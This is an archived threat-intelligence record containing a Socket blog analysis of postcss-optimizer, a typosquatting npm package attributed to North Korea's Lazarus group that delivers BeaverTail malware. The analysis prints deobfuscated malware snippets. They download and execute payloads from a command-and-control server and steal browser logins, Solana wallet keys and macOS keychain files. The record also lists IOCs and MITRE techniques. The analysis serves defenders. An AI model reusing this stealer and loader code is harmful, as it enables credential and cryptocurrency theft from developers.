{
	"id": "6469c489-c451-4000-bfec-a849fb9c7467",
	"created_at": "2026-04-06T00:10:53.410786Z",
	"updated_at": "2026-04-10T13:12:50.024631Z",
	"deleted_at": null,
	"sha1_hash": "fe8791279ae52236d3c9b8bc1361f02bf712c217",
	"title": "North Korean APT Lazarus Targets Developers with Malicious n...",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1567614,
	"plain_text": "North Korean APT Lazarus Targets Developers with Malicious n...\r\nArchived: 2026-04-05 14:42:48 UTC\r\nSecure your dependencies with us\r\nSocket proactively blocks malicious open source packages in your code.\r\nInstall\r\nSocket researchers have discovered the malicious npm package postcss-optimizer , which contains code linked\r\nto previously documented campaigns conducted by North Korean state-sponsored threat actors known as\r\nContagious Interview, a subgroup within the broader Lazarus Advanced Persistent Threat (APT) group.\r\nThe malicious package, which has been downloaded 477 times, contains the BeaverTail malware, functioning as\r\nboth an infostealer and a loader. As a malware loader, the BeaverTail is designed to deploy and execute a second-https://socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package\r\nPage 1 of 9\n\nstage payload, which is likely the InvisibleFerret backdoor based on code similarities and a broader strategy\r\nemployed by the Democratic People’s Republic of Korea (DPRK).\r\nBy impersonating the legitimate postcss library, which has over 16 billion downloads, the threat actor aims to\r\ninfect developers’ systems with credential-stealing and data-exfiltration capabilities across Windows, macOS, and\r\nLinux systems. At the time of publication, the package remains live on npm, but we have petitioned the registry\r\nfor its removal.\r\nLazarus Goes Open Source#\r\nThe malicious package postcss-optimizer , published by a threat actor using the npm registry alias “yolorabbit”,\r\nis designed to closely mimic the legitimate postcss library. The high degree of similarity increases the\r\nlikelihood that a target may mistakenly install it, believing it to be the authentic package.\r\nA screenshot of the legitimate postcss package on the npm registry.\r\nhttps://socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package\r\nPage 2 of 9\n\nA screenshot of the malicious postcss-optimizer package on the npm registry.\r\nAccording to Palo Alto Networks Unit 42 researchers, who originally identified Contagious Interview-style\r\nattacks in 2022, the threat actor engages victims in a staged interview process to persuade them to download and\r\ninstall an npm-based package. The package is likely presented as software for review or analysis, but in reality, it\r\ncontains malicious JavaScript designed to infect the victim’s system with BeaverTail malware.\r\nIn the incident discovered by Socket researchers, the threat actor infiltrated the npm registry with a malicious\r\npackage containing BeaverTail malware — an attack that closely resembles findings from Unit 42. Once installed\r\non a host system, the malware follows a structured multi-stage process to establish persistence, exfiltrate sensitive\r\ndata, and facilitate further compromise.\r\nPersistence is achieved through registry modifications or startup script injections on Windows, while on macOS\r\nand Linux, it relies on Python-based or shell script execution. The malware then exfiltrates sensitive data, such as\r\ncredentials, browser cookies, and local cryptocurrency wallet files by transmitting HTTP POST requests to a\r\ncommand and control (C2) server. Finally, it attempts to fetch and execute additional payloads, reinforcing long-term access and control over the compromised system. These tactics, techniques, and procedures (TTPs) align\r\nwith those previously observed in Lazarus-orchestrated software supply chain attacks.\r\nExploring BeaverTail’s Code#\r\nDespite the threat actor’s use of a JavaScript obfuscation tool to conceal the malicious code, Socket’s automated\r\nanalysis successfully detected and flagged the package as malicious. The obfuscation techniques included variable\r\nrenaming, string encoding, and control flow flattening, all designed to hinder static analysis and evade signature-based detection.\r\nhttps://socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package\r\nPage 3 of 9\n\nSocket’s static and behavioral analysis also detected suspicious execution patterns, including shell command\r\nexecution, file system manipulation, and covert network communication. These indicators, combined with the\r\npackage’s resemblance to previously documented Lazarus-affiliated campaigns, led to its further classification as a\r\nhigh-risk threat.\r\nSocket AI Scanner’s analysis, including contextual details about the malicious postcss-optimizer\r\npackage.\r\nThe following deobfuscated and redacted code snippets have been annotated to highlight the threat actor’s\r\ntechniques, including data exfiltration methods, and mechanisms for retrieving additional payloads.\r\n// Collect system information\r\nconst the_hostname = node_os.hostname(); // Get computer hostname\r\nconst the_platform = node_os.platform(); // Detect OS (Windows, Linux, macOS)\r\nhttps://socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package\r\nPage 4 of 9\n\nconst the_homedir = node_os.homedir(); // Get user home directory\r\nconst the_tempdir = node_os.tmpdir(); // Get system temp directory\r\nThe provided JavaScript snippet collects key system information, as a part of an initial reconnaissance phase. It\r\nretrieves the system’s hostname using node_os.hostname() , which can be used for fingerprinting the infected\r\nmachine and tracking individual infections. The script also determines the operating system with\r\nnode_os.platform() , allowing the malware to tailor its execution based on whether the target is running\r\nWindows, Linux, or macOS. By accessing the user’s home directory via node_os.homedir() , the script positions\r\nitself to locate stored credentials, browser data, or cryptocurrency wallets, all of which are commonly targeted in\r\ninfostealer campaigns.\r\n// Hardcoded malicious server (C2)\r\nconst malicious_url = 'hxxp://91.92.120[.]132:80/client/xxx';\r\n// Determine platform and set execution method\r\nconst script_path = `${the_homedir}/.npl`;\r\nconst execute_script = platform_windows ? `\"${the_homedir}\\\\.pyp\\\\python.exe\" \"${script_path}\"` : `python3 \"${sc\r\n// Fetch and execute additional payload\r\nnode_request.get(malicious_url, (error, response, body) =\u003e {\r\n if (!error) {\r\n node_fs.writeFileSync(script_path, body);\r\n child_process_exec(execute_script);\r\nThe script determines the operating system of the infected machine and dynamically constructs an execution\r\nmethod based on whether the system is running Windows, Linux or macOS. It then contacts a hardcoded C2\r\nserver at hxxp://91.92.120[.]132:80/client/xxx to fetch an additional payload, which is subsequently written\r\nto disk and executed using either Python3 (on Unix-based systems) or a Python executable residing in a hidden\r\nuser directory on Windows.\r\nThe script’s functionality aligns closely with known behaviors of the BeaverTail malware and its associated\r\nsecond-stage malware, InvisibleFerret, as reported by Unit 42. This method was also observed in the eSentire\r\nanalysis, where BeaverTail leveraged cURL to download a Python executable for subsequent execution of\r\nInvisibleFerret, with the payload stored in an .npl script, mirroring the persistence mechanisms in the provided\r\nscript.\r\n// Hardcoded malicious URL for fetching the second-stage payload\r\nconst payload_url = 'hxxp://91.92.120[.]132:80/pdown';\r\n// Define paths for temporary storage of the downloaded payload\r\nconst pzi_filename = `${the_tempdir}/p.zi`; // Initial downloaded file\r\nconst p2zip_filename = `${the_tempdir}/p2.zip`; // Renamed file for extraction\r\n// Craft a cURL command to download the payload (used as an alternative execution method)\r\nhttps://socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package\r\nPage 5 of 9\n\nconst curl_payload_command = `curl -Lo \"${the_tempdir}\\\\p.zi\" \"${payload_url}\"`;\r\nfunction download_main_payload() {\r\n node_request(payload_url, function (error, response, body) {\r\n if (!error) {\r\n // Write the downloaded payload to disk\r\n node_fs.writeFileSync(pzi_filename, body);\r\n \r\n // Rename the file, likely to evade detection or facilitate extraction\r\n node_fs.renameSync(pzi_filename, p2zip_filename);\r\n \r\n // Call function to extract and execute the payload\r\n unpackpayload(p2zip_filename);\r\nThe script first attempts to download the payload using node_request , saving it as p.zi in the system’s\r\ntemporary directory before renaming it to p2.zip , likely to bypass detection mechanisms or prepare it for\r\nextraction. If the direct request fails, the script includes a cURL command as a fallback, reinforcing its resilience\r\nagainst environmental restrictions.\r\nPrior analysis of Lazarus-associated npm attacks by DataDog and Phylum researchers indicates that exfiltrated\r\nfiles are transmitted to the /uploads endpoint, while the Python installation package is retrieved from /pdown ,\r\na pattern also observed in the malicious postcss-optimizer package we analyzed.\r\nAccording to Unit 42’s research, BeaverTail often serves as a downloader, responsible for retrieving secondary-stage payloads, which in prior incidents included InvisibleFerret, a Python-based backdoor. The use of .zi -\r\nformatted files and staged renaming operations were also observed in eSentire’s analysis, where BeaverTail\r\nleveraged similar techniques to disguise and execute downloaded payloads. While network indicators and\r\nexecution patterns strongly suggest that InvisibleFerret was deployed as the second-stage payload, we were unable\r\nto retrieve a sample for direct analysis, as the C2 infrastructure ceased serving the payload prior to collection.\r\n// Hardcoded C2 URL for data exfiltration\r\nconst upload_url = 'hxxp://91.92.120[.]132:80/uploads';\r\n// Function to steal and exfiltrate browser credentials\r\nfunction steal_and_exfiltrate() {\r\n const paths = [\r\n `${the_homedir}/Library/Application Support/Google/Chrome/Login Data`,\r\n `${the_homedir}/Library/Application Support/BraveSoftware/Brave-Browser/Login Data`,\r\n `${the_homedir}/Library/Application Support/Firefox/logins.json`\r\n ];\r\n// Encoded browser extensions (crypto wallets targeted)\r\nconst crypto_wallet_extensions = [\r\n 'nkbihfbeogaeaoehlefnkodbefgpgknn', // MetaMask\r\n 'ejbalbakoplchlghecdalmeeeajnimhm', // Phantom\r\n 'fhbohimaelbohpjbbldcngcnapndodjp', // Binance Wallet\r\nhttps://socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package\r\nPage 6 of 9\n\n'hnfanknocfeofbddgcijnmhnfnkdnaad' // Coinbase Wallet\r\n];\r\n// Function to steal Solana wallet credentials\r\nfunction steal_solana_wallet() {\r\n const solana_wallet_path = `${the_homedir}/.config/solana/id.json`; // Path to Solana private keys\r\n if (node_fs.existsSync(solana_wallet_path)) {\r\n try {\r\n const solana_wallet_data = node_fs.createReadStream(solana_wallet_path);\r\n const stolen_file = { filename: 'solana_id.txt', value: solana_wallet_data };\r\n exfiltrate_data([stolen_file]); // Send stolen private keys to C2 server\r\n// Function to steal macOS login keychain\r\nfunction steal_macos_keychain() {\r\n const keychain_paths = [\r\n `${the_homedir}/Library/Keychains/login.keychain`,\r\n `${the_homedir}/Library/Keychains/login.keychain-db`\r\n ];\r\n \r\n const stolen_files = paths\r\n .filter(path =\u003e node_fs.existsSync(path))\r\n .map(path =\u003e ({ filename: path.split('/').pop(), value: node_fs.createReadStream(path) }));\r\n if (stolen_files.length) {\r\n node_request.post({ url: upload_url, formData: { hid: the_hostname, multi_file: stolen_files } });\r\n }\r\n}\r\n// Execute credential theft and maintain persistence\r\nfunction main() {\r\n try {\r\n steal_and_exfiltrate();\r\n fetch_xxx_payload_awaited(); // Continue malicious execution\r\n } catch (err) {}\r\n}\r\nmain();\r\nsetInterval(main, 600000); // Re-run every 10 minutes to maintain persistence\r\nThe above code is designed to steal sensitive user data, including browser-stored credentials, Solana\r\ncryptocurrency wallet private keys, and macOS login keychain data, before exfiltrating them to a hardcoded C2\r\nserver at hxxp://91.92.120[.]132:80/uploads . It systematically searches for credential storage locations across\r\nGoogle Chrome, Brave, and Firefox, as well as the Solana wallet directory, extracting and transmitting any\r\ndiscovered files.\r\nhttps://socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package\r\nPage 7 of 9\n\nAdditionally, the script includes a predefined list of browser extension IDs associated with cryptocurrency wallets,\r\nspecifically targeting MetaMask, Phantom, Binance Wallet, and Coinbase Wallet, indicating a clear intent to\r\nintercept and exfiltrate private keys and authentication tokens related to digital assets. The Solana-specific\r\nfunction directly accesses the id.json file, which contains private keys, reinforcing its focus on cryptocurrency\r\ntheft.\r\nMoreover, the script specifically targets macOS login keychain data by searching for login.keychain and\r\nlogin.keychain-db within the user’s Library directory, further expanding its credential theft capabilities.\r\nOnce the stolen data is prepared, it is sent to the C2 server using an HTTP POST request, with each stolen file\r\nlabeled based on its source. The script is designed for persistence, executing every 10 minutes to continuously\r\nexfiltrate newly collected credentials and financial data. This functionality closely aligns with previously\r\ndocumented Lazarus-affiliated BeaverTail malware, which was observed in multiple campaigns leveraging npm\r\npackages as an initial infection vector.\r\nOutlook and Recommendations#\r\nThe discovery of postcss-optimizer as a malicious npm package underscores the persistent threat that North\r\nKorean state-sponsored groups pose to the software supply chain. Even a single compromised development\r\nmachine can serve as an entry point for broader network infiltration, credential theft, and data exfiltration.\r\nLazarus-linked campaigns continue to demonstrate adaptability, leveraging open-source ecosystems like npm to\r\ndistribute malware under the guise of legitimate tools. Given the history of similar Lazarus campaigns, and the\r\nrecent malicious campaign, we expect continued iterations of this attack strategy, likely with refinements in\r\nobfuscation techniques and payload delivery mechanisms.\r\nTo mitigate these risks, developers and organizations must take proactive measures to secure their software supply\r\nchains. Regular dependency audits and automated scanning tools should be employed to detect anomalous or\r\nmalicious behaviors in third-party packages before they are integrated into production environments.\r\nSocket’s GitHub app enables real-time monitoring of pull requests, flagging suspicious or malicious packages\r\nbefore they are merged. Running the Socket CLI during npm installations or builds adds another layer of defense\r\nby identifying anomalies in open source dependencies before they reach production. Additionally, using the\r\nSocket browser extension provides on-the-fly protection by analyzing browsing activity and alerting users to\r\npotential threats before they download or interact with malicious content. By integrating these security measures\r\ninto development workflows, organizations can significantly reduce the likelihood of supply chain attacks.\r\nIndicators of Compromise (IOCs)#\r\nMalicious npm Package:\r\npostcss-optimizer\r\nC2 Infrastructure:\r\n91.92.120[.]132:80/client/xxx\r\n91.92.120[.]132:80/pdown\r\n91.92.120[.]132:80/uploads\r\nhttps://socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package\r\nPage 8 of 9\n\nThreat Actor Identifiers:\r\nnpm username: yolorabbit\r\nemail used to register npm username: surprise.eng000@gmail.com\r\nMITRE ATT\u0026CK Techniques#\r\nT1195.002 — Supply Chain Compromise: Compromise Software Supply Chain\r\nT1608.001 — Stage Capabilities: Upload Malware\r\nT1204.002 — User Execution: Malicious File\r\nT1059.007 — Command and Scripting Interpreter: JavaScript\r\nT1059.006 — Command and Scripting Interpreter: Python\r\nT1036.005 — Masquerading: Match Legitimate Name or Location\r\nT1027.013 — Obfuscated Files or Information: Encrypted/Encoded File\r\nT1546.016 — Event Triggered Execution: Installer Packages\r\nT1048 — Exfiltration Over Alternative Protocol\r\nT1583.006 — Acquire Infrastructure: Web Services\r\nT1005 — Data from Local System\r\nT1082 — System Information Discovery\r\nT1083 — File and Directory Discovery\r\nT1217 — Browser Information Discovery\r\nT1555.003 — Credentials from Password Stores: Credentials from Web Browsers\r\nT1555.001 — Credentials from Password Stores: Keychain\r\nT1547.001 — Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nT1071.001 — Application Layer Protocol: Web Protocols\r\nT1041 — Exfiltration Over C2 Channel\r\nT1105 — Ingress Tool Transfer\r\nT1119 — Automated Collection\r\nT1657 — Financial Theft\r\nSource: https://socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package\r\nhttps://socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package"
	],
	"report_names": [
		"north-korean-apt-lazarus-targets-developers-with-malicious-npm-package"
	],
	"threat_actors": [
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434253,
	"ts_updated_at": 1775826770,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fe8791279ae52236d3c9b8bc1361f02bf712c217.pdf",
		"text": "https://archive.orkl.eu/fe8791279ae52236d3c9b8bc1361f02bf712c217.txt",
		"img": "https://archive.orkl.eu/fe8791279ae52236d3c9b8bc1361f02bf712c217.jpg"
	}
}